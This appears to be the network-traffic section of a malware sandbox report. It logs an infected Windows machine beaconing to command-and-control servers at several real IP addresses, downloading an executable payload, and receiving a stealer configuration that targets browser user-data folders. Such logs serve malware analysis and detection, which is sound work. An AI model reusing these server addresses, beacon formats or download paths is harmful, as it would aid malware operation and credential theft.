Jun 27, 2024 05:59:10.338377953 CEST	317	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 46 34 30 43 32 46 39 31 37 41 30 44 43 45 41 46 34 41 30 39 45 33 31 43 38 31 33 30 32 30 33 30 32 35 36 38 31 43 43 31 44 43 44 34 31 36 37 36 36 43 35 41 41 34 34 32 35 38 46 32 32 38 35 43 43 33 30 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5F40C2F917A0DCEAF4A09E31C8130203025681CC1DCD416766C5AA44258F2285CC30
Jun 27, 2024 05:59:10.529958010 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.7	49768	185.172.128.116	80	5404	C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Jun 27, 2024 05:59:11.433801889 CEST	157	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 27, 2024 05:59:11.986042976 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 27, 2024 05:59:12.079703093 CEST	317	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 46 34 30 43 32 46 39 31 37 41 30 44 43 45 41 46 34 41 30 39 45 33 31 43 38 31 33 30 32 30 33 30 32 35 36 38 31 43 43 31 44 43 44 34 31 36 37 36 36 43 35 41 41 34 34 32 35 38 46 32 32 38 35 43 43 33 30 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5F40C2F917A0DCEAF4A09E31C8130203025681CC1DCD416766C5AA44258F2285CC30
Jun 27, 2024 05:59:12.270606995 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.7	49770	185.172.128.116	80	5404	C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Jun 27, 2024 05:59:12.806315899 CEST	157	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 27, 2024 05:59:13.330991983 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 27, 2024 05:59:13.686526060 CEST	317	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 46 34 30 43 32 46 39 31 37 41 30 44 43 45 41 46 34 41 30 39 45 33 31 43 38 31 33 30 32 30 33 30 32 35 36 38 31 43 43 31 44 43 44 34 31 36 37 36 36 43 35 41 41 34 34 32 35 38 46 32 32 38 35 43 43 33 30 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5F40C2F917A0DCEAF4A09E31C8130203025681CC1DCD416766C5AA44258F2285CC30
Jun 27, 2024 05:59:13.886171103 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.7	49773	77.91.77.81	80	8080	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jun 27, 2024 05:59:13.837306976 CEST	180	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 30 31 31 31 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000111001&unit=246122658369
Jun 27, 2024 05:59:14.478518963 CEST	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.7	49774	185.172.128.116	80	5404	C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Jun 27, 2024 05:59:14.197598934 CEST	157	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 27, 2024 05:59:14.766118050 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 27, 2024 05:59:14.870659113 CEST	317	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 46 34 30 43 32 46 39 31 37 41 30 44 43 45 41 46 34 41 30 39 45 33 31 43 38 31 33 30 32 30 33 30 32 35 36 38 31 43 43 31 44 43 44 34 31 36 37 36 36 43 35 41 41 34 34 32 35 38 46 32 32 38 35 43 43 33 30 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5F40C2F917A0DCEAF4A09E31C8130203025681CC1DCD416766C5AA44258F2285CC30
Jun 27, 2024 05:59:15.061153889 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.7	49776	43.153.49.49	8888	8080	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jun 27, 2024 05:59:14.632759094 CEST	171	OUT	GET /down/TpWWMUpe0LEV.exe HTTP/1.1 Host: 43.153.49.49:8888 Cookie: c50233950c3f39bd96d165eee1995d77=4d35933e-4098-4d9c-a342-9194989f64d0.B0uLxE_ywpoMuQTk0RbwSRoCfc4
Jun 27, 2024 05:59:15.176513910 CEST	1236	IN	HTTP/1.1 200 OK Content-Disposition: attachment; filename=whiteheroin.exe Content-Type: application/octet-stream Content-Length: 1228288 Last-Modified: Wed, 26 Jun 2024 19:22:36 GMT Cache-Control: no-cache, max-age=0 Expires: Thu, 27 Jun 2024 03:59:15 GMT ETag: "1719429756.5317302-1228288-125308486" Date: Thu, 27 Jun 2024 03:59:15 GMT Server: nginx Connection: keep-alive X-Frame-Options: SAMEORIGIN Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 01 4e 7c 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 e8 0e 00 00 0a 00 00 00 00 00 00 0e 06 0f 00 00 20 00 00 00 20 0f 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 13 00 00 04 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 c0 05 0f 00 4b 00 00 00 00 e0 12 00 e0 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELN\|f @ @K H.text `._LW `.rsrc@@.reloc@B

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.7	49777	185.172.128.116	80	5404	C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Jun 27, 2024 05:59:15.370793104 CEST	157	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 27, 2024 05:59:15.998267889 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 27, 2024 05:59:16.019992113 CEST	317	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 46 34 30 43 32 46 39 31 37 41 30 44 43 45 41 46 34 41 30 39 45 33 31 43 38 31 33 30 32 30 33 30 32 35 36 38 31 43 43 31 44 43 44 34 31 36 37 36 36 43 35 41 41 34 34 32 35 38 46 32 32 38 35 43 43 33 30 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5F40C2F917A0DCEAF4A09E31C8130203025681CC1DCD416766C5AA44258F2285CC30
Jun 27, 2024 05:59:16.213685989 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.7	49778	185.172.128.116	80	5404	C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Jun 27, 2024 05:59:16.414942980 CEST	157	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 27, 2024 05:59:17.022597075 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 27, 2024 05:59:17.029498100 CEST	317	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 46 34 30 43 32 46 39 31 37 41 30 44 43 45 41 46 34 41 30 39 45 33 31 43 38 31 33 30 32 30 33 30 32 35 36 38 31 43 43 31 44 43 44 34 31 36 37 36 36 43 35 41 41 34 34 32 35 38 46 32 32 38 35 43 43 33 30 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5F40C2F917A0DCEAF4A09E31C8130203025681CC1DCD416766C5AA44258F2285CC30
Jun 27, 2024 05:59:17.223098993 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.7	49780	77.91.77.81	80	8080	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jun 27, 2024 05:59:17.247643948 CEST	180	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 30 31 31 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000112001&unit=246122658369
Jun 27, 2024 05:59:17.861772060 CEST	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.7	49781	185.172.128.116	80	5404	C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Jun 27, 2024 05:59:17.402885914 CEST	157	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 27, 2024 05:59:18.047162056 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 27, 2024 05:59:18.071717978 CEST	317	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 46 34 30 43 32 46 39 31 37 41 30 44 43 45 41 46 34 41 30 39 45 33 31 43 38 31 33 30 32 30 33 30 32 35 36 38 31 43 43 31 44 43 44 34 31 36 37 36 36 43 35 41 41 34 34 32 35 38 46 32 32 38 35 43 43 33 30 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5F40C2F917A0DCEAF4A09E31C8130203025681CC1DCD416766C5AA44258F2285CC30
Jun 27, 2024 05:59:18.267539978 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.7	49783	65.21.175.0	80	8196	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp	Bytes transferred	Direction	Data
Jun 27, 2024 05:59:17.662591934 CEST	408	OUT	POST /108e010e8f91c38c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CGIJJKEHCAKEGCAKJKEC Host: 65.21.175.0 Content-Length: 210 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 43 47 49 4a 4a 4b 45 48 43 41 4b 45 47 43 41 4b 4a 4b 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 36 34 35 36 33 36 37 36 35 31 43 33 38 39 35 36 31 31 32 34 0d 0a 2d 2d 2d 2d 2d 2d 43 47 49 4a 4a 4b 45 48 43 41 4b 45 47 43 41 4b 4a 4b 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6a 6f 70 61 0d 0a 2d 2d 2d 2d 2d 2d 43 47 49 4a 4a 4b 45 48 43 41 4b 45 47 43 41 4b 4a 4b 45 43 2d 2d 0d 0a Data Ascii: ------CGIJJKEHCAKEGCAKJKECContent-Disposition: form-data; name="hwid"46456367651C389561124------CGIJJKEHCAKEGCAKJKECContent-Disposition: form-data; name="build"jopa------CGIJJKEHCAKEGCAKJKEC--
Jun 27, 2024 05:59:18.401384115 CEST	351	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:18 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 156 Connection: keep-alive Vary: Accept-Encoding Data Raw: 59 6a 68 6d 4d 57 5a 6b 4d 6a 46 6c 4d 32 4d 77 5a 47 46 6b 5a 57 49 35 4e 44 41 78 4e 7a 59 78 4e 6d 51 79 59 57 4d 35 4e 57 59 79 4f 57 59 31 4d 7a 6b 35 4d 44 45 77 4f 44 5a 6c 5a 54 6b 31 5a 6a 51 79 59 7a 46 6b 4e 32 49 79 5a 57 4e 6b 5a 54 51 78 4d 6a 49 33 59 7a 42 69 5a 54 68 69 66 47 70 69 5a 48 52 68 61 57 70 76 64 6d 64 38 5a 57 6c 74 5a 57 68 79 64 6e 70 76 5a 43 35 6d 61 57 78 6c 66 44 46 38 4d 48 77 78 66 44 46 38 4d 58 77 78 66 44 46 38 4d 58 77 3d Data Ascii: YjhmMWZkMjFlM2MwZGFkZWI5NDAxNzYxNmQyYWM5NWYyOWY1Mzk5MDEwODZlZTk1ZjQyYzFkN2IyZWNkZTQxMjI3YzBiZThifGpiZHRhaWpvdmd8ZWltZWhydnpvZC5maWxlfDF8MHwxfDF8MXwxfDF8MXw=
Jun 27, 2024 05:59:18.405919075 CEST	466	OUT	POST /108e010e8f91c38c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HJDAKFBFBFBAAAAAEBKJ Host: 65.21.175.0 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 48 4a 44 41 4b 46 42 46 42 46 42 41 41 41 41 41 45 42 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 38 66 31 66 64 32 31 65 33 63 30 64 61 64 65 62 39 34 30 31 37 36 31 36 64 32 61 63 39 35 66 32 39 66 35 33 39 39 30 31 30 38 36 65 65 39 35 66 34 32 63 31 64 37 62 32 65 63 64 65 34 31 32 32 37 63 30 62 65 38 62 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 44 41 4b 46 42 46 42 46 42 41 41 41 41 41 45 42 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 44 41 4b 46 42 46 42 46 42 41 41 41 41 41 45 42 4b 4a 2d 2d 0d 0a Data Ascii: ------HJDAKFBFBFBAAAAAEBKJContent-Disposition: form-data; name="token"b8f1fd21e3c0dadeb94017616d2ac95f29f539901086ee95f42c1d7b2ecde41227c0be8b------HJDAKFBFBFBAAAAAEBKJContent-Disposition: form-data; name="message"browsers------HJDAKFBFBFBAAAAAEBKJ--
Jun 27, 2024 05:59:18.663609028 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:18 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 1520 Connection: keep-alive Vary: Accept-Encoding Data Raw: 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 53 42 44 59 57 35 68 63 6e 6c 38 58 45 64 76 62 32 64 73 5a 56 78 44 61 48 4a 76 62 57 55 67 55 33 68 54 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 78 44 61 48 4a 76 62 57 6c 31 62 58 78 63 51 32 68 79 62 32 31 70 64 57 31 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 78 6a 61 48 4a 76 62 57 55 75 5a 58 68 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 56 47 39 79 59 32 68 38 58 46 52 76 63 6d 4e 6f 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 4d 48 78 57 61 58 5a 68 62 47 52 70 66 46 78 57 61 58 5a 68 62 47 52 70 58 46 [TRUNCATED] Data Ascii: R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8R29vZ2xlIENocm9tZSBDYW5hcnl8XEdvb2dsZVxDaHJvbWUgU3hTXFVzZXIgRGF0YXxjaHJvbWV8Y2hyb21lLmV4ZXxDaHJvbWl1bXxcQ2hyb21pdW1cVXNlciBEYXRhfGNocm9tZXxjaHJvbWUuZXhlfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfDB8VG9yY2h8XFRvcmNoXFVzZXIgRGF0YXxjaHJvbWV8MHxWaXZhbGRpfFxWaXZhbGRpXFVzZXIgRGF0YXxjaHJvbWV8dml2YWxkaS5leGV8Q29tb2RvIERyYWdvbnxcQ29tb2RvXERyYWdvblxVc2VyIERhdGF8Y2hyb21lfDB8RXBpY1ByaXZhY3lCcm93c2VyfFxFcGljIFByaXZhY3kgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8Q29jQ29jfFxDb2NDb2NcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8QnJhdmV8XEJyYXZlU29mdHdhcmVcQnJhdmUtQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyYXZlLmV4ZXxDZW50IEJyb3dzZXJ8XENlbnRCcm93c2VyXFVzZXIgRGF0YXxjaHJvbWV8MHw3U3RhcnxcN1N0YXJcN1N0YXJcVXNlciBEYXRhfGNocm9tZXwwfENoZWRvdCBCcm93c2VyfFxDaGVkb3RcVXNlciBEYXRhfGNocm9tZXwwfE1pY3Jvc29mdCBFZGdlfFxNaWNyb3NvZnRcRWRnZVxVc2VyIERhdGF8Y2hyb21lfG1zZWRnZS5leGV8MzYwIEJyb3dzZXJ8XDM2MEJyb3dzZXJcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8UVFCcm93c2VyfFxUZW5jZW50XFFRQnJvd3NlclxV [TRUNCATED]
